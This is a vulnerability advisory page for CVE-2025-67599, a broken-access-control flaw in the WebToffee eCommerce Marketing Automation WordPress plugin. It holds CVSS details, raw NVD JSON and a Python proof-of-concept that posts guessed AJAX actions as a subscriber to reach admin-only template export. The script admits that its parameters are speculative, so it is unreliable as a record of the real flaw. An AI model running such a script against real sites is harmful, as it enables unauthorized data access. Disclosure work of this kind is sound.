Security Vulnerability Report
中文
CVE-2025-67599 CVSS 4.3 MEDIUM

CVE-2025-67599

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in WebToffee WebToffee eCommerce Marketing Automation decorator-woocommerce-email-customizer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebToffee eCommerce Marketing Automation: from n/a through <= 2.1.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebToffee eCommerce Marketing Automation plugin <= 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67599 PoC - Missing Authorization in WebToffee plugin # Target: WordPress site with WebToffee eCommerce Marketing Automation <= 2.1.1 target = "http://target-wordpress-site.com" # Obtain a low-privilege user session cookie (subscriber role) session = requests.Session() # Step 1: Authenticate as low-privilege user (subscriber) # Replace with valid credentials login_data = { 'log': 'subscriber_user', 'pwd': 'subscriber_password', 'wp-submit': 'Log In' } # session.post(f'{target}/wp-login.php', data=login_data) # Step 2: Identify the vulnerable endpoint # The plugin has an AJAX endpoint that lacks proper authorization checks vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/decorator-email-template' ] # Step 3: Exploit the missing authorization # This example shows accessing admin-only functionality for endpoint in vulnerable_endpoints: exploit_data = { 'action': 'wt_decorator_ajax_action', 'sub_action': 'export_email_templates', # Additional parameters depending on the specific vulnerable function } response = session.post( f'{target}{endpoint}', data=exploit_data, headers={'Content-Type': 'application/x-www-form-urlencoded'} ) if response.status_code == 200: print(f"[!] Potential vulnerability confirmed at {endpoint}") print(f"Response: {response.text[:500]}") print("[*] Note: This PoC demonstrates the authorization bypass concept.") print("[*] Actual exploitation requires identifying specific vulnerable functions.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67599", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:38.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WebToffee WebToffee eCommerce Marketing Automation decorator-woocommerce-email-customizer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebToffee eCommerce Marketing Automation: from n/a through <= 2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/decorator-woocommerce-email-customizer/vulnerability/wordpress-webtoffee-ecommerce-marketing-automation-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}